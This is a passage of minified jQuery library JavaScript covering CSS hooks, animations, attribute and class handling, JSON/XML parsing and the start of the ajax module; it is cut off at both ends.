type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=d&&d.style){c.cssText="float:left;opacity:.5",k.opacity="0.5"===c.opacity,k.cssFloat=!!c.cssFloat,b.style.backgroundClip="content-box",b.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===b.style.backgroundClip,k.boxSizing=""===c.boxSizing||""===c.MozBoxSizing||""===c.WebkitBoxSizing,m.extend(k,{reliableHiddenOffsets:function(){return null==g&&i(),g},boxSizingReliable:function(){return null==f&&i(),f},pixelPosition:function(){return null==e&&i(),e},reliableMarginRight:function(){return null==h&&i(),h}});function i(){var b,c,d,i;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),b.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",e=f=!1,h=!0,a.getComputedStyle&&(e="1%"!==(a.getComputedStyle(b,null)||{}).top,f="4px"===(a.getComputedStyle(b,null)||{width:"4px"}).width,i=b.appendChild(y.createElement("div")),i.style.cssText=b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",i.style.marginRight=i.style.width="0",b.style.width="1px",h=!parseFloat((a.getComputedStyle(i,null)||{}).marginRight)),b.innerHTML="<table><tr><td></td><td>t</td></tr></table>",i=b.getElementsByTagName("td"),i[0].style.cssText="margin:0;border:0;padding:0;display:none",g=0===i[0].offsetHeight,g&&(i[0].style.display="",i[1].style.display="none",g=0===i[0].offsetHeight),c.removeChild(d))}}}(),m.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var Mb=/alpha\([^)]*\)/i,Nb=/opacity\s*=\s*([^)]*)/,Ob=/^(none|table(?!-c[ea]).+)/,Pb=new RegExp("^("+S+")(.*)$","i"),Qb=new RegExp("^([+-])=("+S+")","i"),Rb={position:"absolute",visibility:"hidden",display:"block"},Sb={letterSpacing:"0",fontWeight:"400"},Tb=["Webkit","O","Moz","ms"];function Ub(a,b){if(b in a)return b;var c=b.charAt(0).toUpperCase()+b.slice(1),d=b,e=Tb.length;while(e--)if(b=Tb[e]+c,b in a)return b;return d}function Vb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=m._data(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&U(d)&&(f[g]=m._data(d,"olddisplay",Fb(d.nodeName)))):(e=U(d),(c&&"none"!==c||!e)&&m._data(d,"olddisplay",e?c:m.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}function Wb(a,b,c){var d=Pb.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Xb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=m.css(a,c+T[f],!0,e)),d?("content"===c&&(g-=m.css(a,"padding"+T[f],!0,e)),"margin"!==c&&(g-=m.css(a,"border"+T[f]+"Width",!0,e))):(g+=m.css(a,"padding"+T[f],!0,e),"padding"!==c&&(g+=m.css(a,"border"+T[f]+"Width",!0,e)));return g}function Yb(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=Ib(a),g=k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=Jb(a,b,f),(0>e||null==e)&&(e=a.style[b]),Hb.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Xb(a,b,c||(g?"border":"content"),d,f)+"px"}m.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Jb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":k.cssFloat?"cssFloat":"styleFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=m.camelCase(b),i=a.style;if(b=m.cssProps[h]||(m.cssProps[h]=Ub(i,h)),g=m.cssHooks[b]||m.cssHooks[h],void 0===c)return g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b];if(f=typeof c,"string"===f&&(e=Qb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(m.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||m.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),!(g&&"set"in g&&void 0===(c=g.set(a,c,d)))))try{i[b]=c}catch(j){}}},css:function(a,b,c,d){var e,f,g,h=m.camelCase(b);return b=m.cssProps[h]||(m.cssProps[h]=Ub(a.style,h)),g=m.cssHooks[b]||m.cssHooks[h],g&&"get"in g&&(f=g.get(a,!0,c)),void 0===f&&(f=Jb(a,b,d)),"normal"===f&&b in Sb&&(f=Sb[b]),""===c||c?(e=parseFloat(f),c===!0||m.isNumeric(e)?e||0:f):f}}),m.each(["height","width"],function(a,b){m.cssHooks[b]={get:function(a,c,d){return c?Ob.test(m.css(a,"display"))&&0===a.offsetWidth?m.swap(a,Rb,function(){return Yb(a,b,d)}):Yb(a,b,d):void 0},set:function(a,c,d){var e=d&&Ib(a);return Wb(a,c,d?Xb(a,b,d,k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,e),e):0)}}}),k.opacity||(m.cssHooks.opacity={get:function(a,b){return Nb.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=m.isNumeric(b)?"alpha(opacity="+100*b+")":"",f=d&&d.filter||c.filter||"";c.zoom=1,(b>=1||""===b)&&""===m.trim(f.replace(Mb,""))&&c.removeAttribute&&(c.removeAttribute("filter"),""===b||d&&!d.filter)||(c.filter=Mb.test(f)?f.replace(Mb,e):f+" "+e)}}),m.cssHooks.marginRight=Lb(k.reliableMarginRight,function(a,b){return b?m.swap(a,{display:"inline-block"},Jb,[a,"marginRight"]):void 0}),m.each({margin:"",padding:"",border:"Width"},function(a,b){m.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+T[d]+b]=f[d]||f[d-2]||f[0];return e}},Gb.test(a)||(m.cssHooks[a+b].set=Wb)}),m.fn.extend({css:function(a,b){return V(this,function(a,b,c){var d,e,f={},g=0;if(m.isArray(b)){for(d=Ib(a),e=b.length;e>g;g++)f[b[g]]=m.css(a,b[g],!1,d);return f}return void 0!==c?m.style(a,b,c):m.css(a,b)},a,b,arguments.length>1)},show:function(){return Vb(this,!0)},hide:function(){return Vb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){U(this)?m(this).show():m(this).hide()})}});function Zb(a,b,c,d,e){return new Zb.prototype.init(a,b,c,d,e)}m.Tween=Zb,Zb.prototype={constructor:Zb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(m.cssNumber[c]?"":"px")
-    },cur:function(){var a=Zb.propHooks[this.prop];return a&&a.get?a.get(this):Zb.propHooks._default.get(this)},run:function(a){var b,c=Zb.propHooks[this.prop];return this.pos=b=this.options.duration?m.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Zb.propHooks._default.set(this),this}},Zb.prototype.init.prototype=Zb.prototype,Zb.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=m.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){m.fx.step[a.prop]?m.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[m.cssProps[a.prop]]||m.cssHooks[a.prop])?m.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Zb.propHooks.scrollTop=Zb.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle|show|hide)$/,bc=new RegExp("^(?:([+-])=|)("+S+")([a-z%]*)$","i"),cc=/queueHooks$/,dc=[ic],ec={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=bc.exec(b),f=e&&e[3]||(m.cssNumber[a]?"":"px"),g=(m.cssNumber[a]||"px"!==f&&+d)&&bc.exec(m.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,m.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function fc(){return setTimeout(function(){$b=void 0}),$b=m.now()}function gc(a,b){var c,d={height:a},e=0;for(b=b?1:0;4>e;e+=2-b)c=T[e],d["margin"+c]=d["padding"+c]=a;return b&&(d.opacity=d.width=a),d}function hc(a,b,c){for(var d,e=(ec[b]||[]).concat(ec["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function ic(a,b,c){var d,e,f,g,h,i,j,l,n=this,o={},p=a.style,q=a.nodeType&&U(a),r=m._data(a,"fxshow");c.queue||(h=m._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,n.always(function(){n.always(function(){h.unqueued--,m.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[p.overflow,p.overflowX,p.overflowY],j=m.css(a,"display"),l="none"===j?m._data(a,"olddisplay")||Fb(a.nodeName):j,"inline"===l&&"none"===m.css(a,"float")&&(k.inlineBlockNeedsLayout&&"inline"!==Fb(a.nodeName)?p.zoom=1:p.display="inline-block")),c.overflow&&(p.overflow="hidden",k.shrinkWrapBlocks()||n.always(function(){p.overflow=c.overflow[0],p.overflowX=c.overflow[1],p.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],ac.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(q?"hide":"show")){if("show"!==e||!r||void 0===r[d])continue;q=!0}o[d]=r&&r[d]||m.style(a,d)}else j=void 0;if(m.isEmptyObject(o))"inline"===("none"===j?Fb(a.nodeName):j)&&(p.display=j);else{r?"hidden"in r&&(q=r.hidden):r=m._data(a,"fxshow",{}),f&&(r.hidden=!q),q?m(a).show():n.done(function(){m(a).hide()}),n.done(function(){var b;m._removeData(a,"fxshow");for(b in o)m.style(a,b,o[b])});for(d in o)g=hc(q?r[d]:0,d,n),d in r||(r[d]=g.start,q&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function jc(a,b){var c,d,e,f,g;for(c in a)if(d=m.camelCase(c),e=b[d],f=a[c],m.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=m.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function kc(a,b,c){var d,e,f=0,g=dc.length,h=m.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=$b||fc(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:m.extend({},b),opts:m.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:$b||fc(),duration:c.duration,tweens:[],createTween:function(b,c){var d=m.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(jc(k,j.opts.specialEasing);g>f;f++)if(d=dc[f].call(j,a,k,j.opts))return d;return m.map(k,hc,j),m.isFunction(j.opts.start)&&j.opts.start.call(a,j),m.fx.timer(m.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}m.Animation=m.extend(kc,{tweener:function(a,b){m.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],ec[c]=ec[c]||[],ec[c].unshift(b)},prefilter:function(a,b){b?dc.unshift(a):dc.push(a)}}),m.speed=function(a,b,c){var d=a&&"object"==typeof a?m.extend({},a):{complete:c||!c&&b||m.isFunction(a)&&a,duration:a,easing:c&&b||b&&!m.isFunction(b)&&b};return d.duration=m.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in m.fx.speeds?m.fx.speeds[d.duration]:m.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){m.isFunction(d.old)&&d.old.call(this),d.queue&&m.dequeue(this,d.queue)},d},m.fn.extend({fadeTo:function(a,b,c,d){return this.filter(U).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=m.isEmptyObject(a),f=m.speed(b,c,d),g=function(){var b=kc(this,m.extend({},a),f);(e||m._data(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=m.timers,g=m._data(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&cc.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&m.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=m._data(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=m.timers,g=d?d.length:0;for(c.finish=!0,m.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),m.each(["toggle","show","hide"],function(a,b){var c=m.fn[b];m.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(gc(b,!0),a,d,e)}}),m.each({slideDown:gc("show"),slideUp:gc("hide"),slideToggle:gc("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){m.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),m.timers=[],m.fx.tick=function(){var a,b=m.timers,c=0;for($b=m.now();c<b.length;c++)a=b[c],a()||b[c]!==a||b.splice(c--,1);b.length||m.fx.stop(),$b=void 0},m.fx.timer=function(a){m.timers.push(a),a()?m.fx.start():m.timers.pop()},m.fx.interval=13,m.fx.start=function(){_b||(_b=setInterval(m.fx.tick,m.fx.interval))},m.fx.stop=function(){clearInterval(_b),_b=null},m.fx.speeds={slow:600,fast:200,_default:400},m.fn.delay=function(a,b){return a=m.fx?m.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a,b,c,d,e;b=y.createElement("div"),b.setAttribute("className","t"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=y.createElement("select"),e=c.appendChild(y.createElement("option")),a=b.getElementsByTagName("input")[0],d.style.cssText="top:1px",k.getSetAttribute="t"!==b.className,k.style=/top/.test(d.getAttribute("style")),k.hrefNormalized="/a"===d.getAttribute("href"),k.checkOn=!!a.value,k.optSelected=e.selected,k.enctype=!!y.createElement("form").enctype,c.disabled=!0,k.optDisabled=!e.disabled,a=y.createElement("input"),a.setAttribute("value",""),k.input=""===a.getAttribute("value"),a.value="t",a.setAttribute("type","radio"),k.radioValue="t"===a.value}();var lc=/\r/g;m.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=m.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,m(this).val()):a,null==e?e="":"number"==typeof e?e+="":m.isArray(e)&&(e=m.map(e,function(a){return null==a?"":a+""})),b=m.valHooks[this.type]||m.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=m.valHooks[e.type]||m.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(lc,""):null==c?"":c)}}}),m.extend({valHooks:{option:{get:function(a){var b=m.find.attr(a,"value");return null!=b?b:m.trim(m.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&m.nodeName(c.parentNode,"optgroup"))){if(b=m(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=m.makeArray(b),g=e.length;while(g--)if(d=e[g],m.inArray(m.valHooks.option.get(d),f)>=0)try{d.selected=c=!0}catch(h){d.scrollHeight}else d.selected=!1;return c||(a.selectedIndex=-1),e}}}}),m.each(["radio","checkbox"],function(){m.valHooks[this]={set:function(a,b){return m.isArray(b)?a.checked=m.inArray(m(a).val(),b)>=0:void 0}},k.checkOn||(m.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var mc,nc,oc=m.expr.attrHandle,pc=/^(?:checked|selected)$/i,qc=k.getSetAttribute,rc=k.input;m.fn.extend({attr:function(a,b){return V(this,m.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){m.removeAttr(this,a)})}}),m.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===K?m.prop(a,b,c):(1===f&&m.isXMLDoc(a)||(b=b.toLowerCase(),d=m.attrHooks[b]||(m.expr.match.bool.test(b)?nc:mc)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=m.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void m.removeAttr(a,b))},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=m.propFix[c]||c,m.expr.match.bool.test(c)?rc&&qc||!pc.test(c)?a[d]=!1:a[m.camelCase("default-"+c)]=a[d]=!1:m.attr(a,c,""),a.removeAttribute(qc?c:d)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&m.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),nc={set:function(a,b,c){return b===!1?m.removeAttr(a,c):rc&&qc||!pc.test(c)?a.setAttribute(!qc&&m.propFix[c]||c,c):a[m.camelCase("default-"+c)]=a[c]=!0,c}},m.each(m.expr.match.bool.source.match(/\w+/g),function(a,b){var c=oc[b]||m.find.attr;oc[b]=rc&&qc||!pc.test(b)?function(a,b,d){var e,f;return d||(f=oc[b],oc[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,oc[b]=f),e}:function(a,b,c){return c?void 0:a[m.camelCase("default-"+b)]?b.toLowerCase():null}}),rc&&qc||(m.attrHooks.value={set:function(a,b,c){return m.nodeName(a,"input")?void(a.defaultValue=b):mc&&mc.set(a,b,c)}}),qc||(mc={set:function(a,b,c){var d=a.getAttributeNode(c);return d||a.setAttributeNode(d=a.ownerDocument.createAttribute(c)),d.value=b+="","value"===c||b===a.getAttribute(c)?b:void 0}},oc.id=oc.name=oc.coords=function(a,b,c){var d;return c?void 0:(d=a.getAttributeNode(b))&&""!==d.value?d.value:null},m.valHooks.button={get:function(a,b){var c=a.getAttributeNode(b);return c&&c.specified?c.value:void 0},set:mc.set},m.attrHooks.contenteditable={set:function(a,b,c){mc.set(a,""===b?!1:b,c)}},m.each(["width","height"],function(a,b){m.attrHooks[b]={set:function(a,c){return""===c?(a.setAttribute(b,"auto"),c):void 0}}})),k.style||(m.attrHooks.style={get:function(a){return a.style.cssText||void 0},set:function(a,b){return a.style.cssText=b+""}});var sc=/^(?:input|select|textarea|button|object)$/i,tc=/^(?:a|area)$/i;m.fn.extend({prop:function(a,b){return V(this,m.prop,a,b,arguments.length>1)},removeProp:function(a){return a=m.propFix[a]||a,this.each(function(){try{this[a]=void 0,delete this[a]}catch(b){}})}}),m.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!m.isXMLDoc(a),f&&(b=m.propFix[b]||b,e=m.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=m.find.attr(a,"tabindex");return b?parseInt(b,10):sc.test(a.nodeName)||tc.test(a.nodeName)&&a.href?0:-1}}}}),k.hrefNormalized||m.each(["href","src"],function(a,b){m.propHooks[b]={get:function(a){return a.getAttribute(b,4)}}}),k.optSelected||(m.propHooks.selected={get:function(a){var b=a.parentNode;return b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex),null}}),m.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){m.propFix[this.toLowerCase()]=this}),k.enctype||(m.propFix.enctype="encoding");var uc=/[\t\r\n\f]/g;m.fn.extend({addClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j="string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).addClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=m.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j=0===arguments.length||"string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).removeClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?m.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(m.isFunction(a)?function(c){m(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=m(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===K||"boolean"===c)&&(this.className&&m._data(this,"__className__",this.className),this.className=this.className||a===!1?"":m._data(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(uc," ").indexOf(b)>=0)return!0;return!1}}),m.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){m.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),m.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var vc=m.now(),wc=/\?/,xc=/(,)|(\[|{)|(}|])|"(?:[^"\\\r\n]|\\["\\\/bfnrt]|\\u[\da-fA-F]{4})*"\s*:?|true|false|null|-?(?!0\d)\d+(?:\.\d+|)(?:[eE][+-]?\d+|)/g;m.parseJSON=function(b){if(a.JSON&&a.JSON.parse)return a.JSON.parse(b+"");var c,d=null,e=m.trim(b+"");return e&&!m.trim(e.replace(xc,function(a,b,e,f){return c&&b&&(d=0),0===d?a:(c=e||b,d+=!f-!e,"")}))?Function("return "+e)():m.error("Invalid JSON: "+b)},m.parseXML=function(b){var c,d;if(!b||"string"!=typeof b)return null;try{a.DOMParser?(d=new DOMParser,c=d.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b))}catch(e){c=void 0}return c&&c.documentElement&&!c.getElementsByTagName("parsererror").length||m.error("Invalid XML: "+b),c};var yc,zc,Ac=/#.*$/,Bc=/([?&])_=[^&]*/,Cc=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Dc=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Ec=/^(?:GET|HEAD)$/,Fc=/^\/\//,Gc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Hc={},Ic={},Jc="*/".concat("*");try{zc=location.href}catch(Kc){zc=y.createElement("a"),zc.href="",zc=zc.href}yc=Gc.exec(zc.toLowerCase())||[];function Lc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(m.isFunction(c))while(d=f[e++])"+"===d.charAt(0)?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Mc(a,b,c,d){var e={},f=a===Ic;function g(h){var i;return e[h]=!0,m.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function Nc(a,b){var c,d,e=m.ajaxSettings.flatOptions||{};for(d in b)void 0!==b[d]&&((e[d]?a:c||(c={}))[d]=b[d]);return c&&m.extend(!0,a,c),a}function Oc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType||b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]||a.converters[g+" "+i[0]]){f=g;break}d||(d=g)}f=f||d}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function Pc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}m.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:zc,type:"GET",isLocal:Dc.test(yc[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Jc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":m.parseJSON,"text xml":m.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?Nc(Nc(a,m.ajaxSettings),b):Nc(m.ajaxSettings,a)},ajaxPrefilter:Lc(Hc),ajaxTransport:Lc(Ic),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=m.ajaxSetup({},b),l=k.context||k,n=k.context&&(l.nodeType||l.jquery)?m(l):m.event,o=m.Deferred(),p=m.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!j){j={};while(b=Cc.exec(f))j[b[1].toLowerCase()]=b[2]}b=j[a.toLowerCase()]}return 